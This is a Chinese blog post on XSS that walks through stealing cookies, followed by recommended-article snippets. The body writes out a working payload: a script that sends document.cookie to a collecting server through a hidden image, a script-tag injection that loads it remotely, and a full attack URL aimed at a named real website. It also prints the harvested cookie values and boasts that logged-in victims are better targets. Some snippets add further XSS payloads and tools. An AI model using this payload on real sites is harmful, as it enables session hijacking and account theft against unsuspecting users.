XSS Payload 远程脚本攻击

最新推荐文章于 2024-05-22 10:49:06 发布
最新推荐文章于 2024-05-22 10:49:06 发布
阅读量6.1k 收藏 4
点赞数 1
分类专栏: web前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevon_sun/article/details/51135880
版权

今天看了一本书,关于web安全方面的,所以也动手测试了以下。

下面就只讲一下 XSS Payload远程脚本攻击吧, 执行远程脚本,提取cookie


先来个简单的吧

<script>alert(1);</script>


首先说明像chrome、ie新版等浏览器已经有css防御

比如以下是chrome浏览器打印出来的,chrome浏览器的安全机制是比较强大的


后来试用了火狐浏览器,没想到确实可以。



那么下边我们来做个提取cookies信息的js,另外写一个servlet进行打印“存储”


js文件如下


var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://127.0.0.1:8080/Test/hello?cookie='+encodeURIComponent(document.cookie);

servlet就不写了,简单的get请求,获取参数进行打印


然后启动这个服务。

把 这段代码注入到页面中

<script src="http://127.0.0.1:8080/Test/static/p.js"></script>


例如访问路径为:
http://codecloud.net/?s=<script src='http://127.0.0.1:8080/Test/static/p.js'></script>

OK,后台打印cookie信息成功。

Hm_lvt_f9c50534f93ca6e9404bc6bcb294115c=1460455423; Hm_lpvt_f9c50534f93ca6e9404bc6bcb294115c=1460458080; BDTUJIAID=0f260b8f0f6bd80e5a66403f2918b693; _ga=GA1.2.1298042985.1460455423; _gat=1

毫无压力所有cookie到手,如果当时用户登录中效果更佳 :)


版权属于: 技术客
官方地址: http://www.sunjs.com 
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


sunjs技术客""
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS远程代码执行
qq_46320532的博客
07-07 1217
DOM型 脏数据的输入 1、document.referer 以上代码输出了document.referer属性,而第一次访问该页面的时候并没有该属性,所以我们构造一个含有脚本代码的url来产生referer,当单击连接时,便能执行XSS代码 2、location 使用location.href能管理页面法人URL 脏数据输出 输出在这里指定是能使字符串在页面中输出的方法或函数,比如innerHTML、document.write等 1、测试和发掘DOM型XSS输出对对象的流程 跟踪输
XSS漏洞之加载远程js文件
baiao3360的博客
09-11 1876
前言 这次在对一个系统渗透测试过程中,发现一个XSS漏洞,可弹窗,并且没有httponly,但是在尝试加载远程js文件的时候发现,script标签被过滤掉了,准确的说应该是服务器后端在识别到输入内容有<>的时候,会把每对尖括号以及尖括号里面的内容都过滤掉,唯独有一个特例,就是img标签不会。 在网上找了一些资料,发现可以用img来加载远程js,陆陆续续试过以下几个方法: ...
关于谷歌浏览器特性的一些xss payload
春日野穹
01-24 1964
details 标签 details标签用于描述文档或文档某个部分的细节,目前只有 Chrome 支持 details标签 ">'><details/open/οntοggle=confirm(1)> autofocus属性 说明 autofocus 属性规定当页面加载时标签内元素应该自动获得焦点 onfocus 事件在对象获得焦点时发生 结合起来即可达到弹窗效果 在chrome中autofocus可以与所有HTML标签一起使用,可以利用autofocus属性进行自定义标签 &lt
什么是XSS攻击XSS跨站脚本攻击及防护(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-22 2530
XSS(Cross-Site Scripting,跨站脚本攻击)是一种代码注入攻击攻击者在目标网站上注入恶意代码,当用户(被攻击者)登录网站时就会执行这些恶意代码,通过这些脚本可以读取cookie,session tokens,或者网站其他敏感的网站信息,对用户进行钓鱼欺诈。XSS玫击原理XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript 编写的恶意代码,也有使用其他客户端脚本语言编写的。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行
051 xss跨站脚本攻击
鸡蛋炒鸡蛋
03-08 2612
文章目录一:ShellCode1.1:简述1.2:调用shellcode的四种方式1.2.1:远程调用JS1.2.2:windows.location.hash1.2.3:xss Downloader1.2.4:备选存储技术二:XSS的防御2.1:使用XSS Filter输入过滤输入验证数据消毒输出编码黑白名单2.2:防御DOM-XSS三:XSS实战实验3.1:beef简介3.2:beef的简单准备3.3:浏览器劫持 一:ShellCode 1.1:简述 shellcode就是在利用漏洞所执行的代码。 完整
XSS文件包含漏洞
qq_45616828的博客
10-11 244
XSS文件漏洞
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 2963
XSS(cross-site script)跨站脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
记录几种XSS绕过方式1
08-03
攻击者无法直接使用`script`标签时,可以利用`<base>`标签指定一个外部资源的URL,使得页面加载攻击者的JS文件,如`<base href="http://www.attacker.com">`,然后利用该规则加载包含恶意脚本远程JS文件。...
xssshell工具一份
09-28
3. **XSSTunnel - v1.0.8**:这个组件可能是用于建立XSS隧道的模块,允许攻击者通过被感染用户的浏览器通道进行远程通信,实现数据的隐秘传输。XSS隧道技术在某些情况下可以绕过传统的防火墙和入侵检测系统。 **...
ChromeRce:2021年4月15日出现的Chrome payload
04-16
这些脚本可能包括但不限于:XSS(跨站脚本攻击、DOM操作、内存破坏等技术。 标签"chrome rce HTML"表明此问题与Chrome浏览器的RCE漏洞有关,并且是通过HTML文档来实施的。HTML文档中的恶意代码可能是通过注入恶意...
R3vSh3ll3r:使用JavaScript和XSS进行反向Shell
05-15
R3vSh3ll3r是一个工具,它利用JavaScript和跨站脚本XSS)漏洞来创建反向Shell,允许攻击者在目标系统上获取远程命令执行的能力。这个工具主要用于渗透测试和安全研究,而不是非法入侵。在本文中,我们将详细探讨...
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
满足渗透测试中所有项目的字典集fuzzDicts-master.zip
08-26
"XXEDicts" 涉及到XSS(跨站脚本攻击)的字典,XSS是一种常见的Web应用安全漏洞,允许攻击者注入恶意脚本到用户浏览器。这个字典集可能包含各种可能的XSS payload,用于测试Web应用的防护能力。 "easyXssPayload" ...
【MSFconsole进阶】Payload攻击载荷模块):payload分类、相关命令、使用方法
05-24 7334
【渗透工具】MSFconsole进阶:Payload攻击载荷模块)
CTF入坑日志
Grey的博客
04-25 8505
赛事介绍CTF竞赛模式分为以下三类:一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。二、攻防模式(Attack-Defense)在攻防模式CTF赛制...
XSS(跨站脚本攻击)漏洞解决方案
热门推荐
菜鸟
07-11 3万+
昨天师傅通知我,上周提交的代码中发现了XSS漏洞,让我解决一下,作为小白鼠的我还是硬着头皮寻东问西的找人找解决方案,最终在公司两位前辈的指导下重写了代码解决了这个漏洞。现汇总如下: 首先,简单介绍一下XSS定义: 一 、 XSS介绍 XSS是跨站脚本攻击(Cross Site Scripting)的缩写。为了和层叠样式表CSS(Cascading Style Sheets)加以区分,因此将跨
9447 ctf writeup
ling
12-01 1860
9447 ctfwriteup 只做了一些低分值的逆向和pwn题目。 1. flag finder& the real flag finder 这两个题目一个1分,1个70分,没有看出难度有啥差别,都是明文比较,直接在比较的地方下断点,就看到flag了。   2.Hello joe 程序最开始mmap了0x6000的空间大小。之后调用了6次间接跳转。经调试发现,这六次间接跳转分
web安全之XSS浅析
LQ55
10-11 667
Web安全定义 随着web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取内部数据,更为严重的则是在网
XSS常用payload整理(持续更新)
纸房子
12-13 6130
XSS常用payload
XSS跨站脚本攻击详解与防御策略
"该资源主要介绍了XSS跨站脚本攻击的相关知识,包括攻击的定义、类型、漏洞挖掘以及防范措施。此外,还探讨了Web安全的三个主要目标:保护Web服务器及其数据的安全、保护信息传递的安全以及保护终端用户设备的安全。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值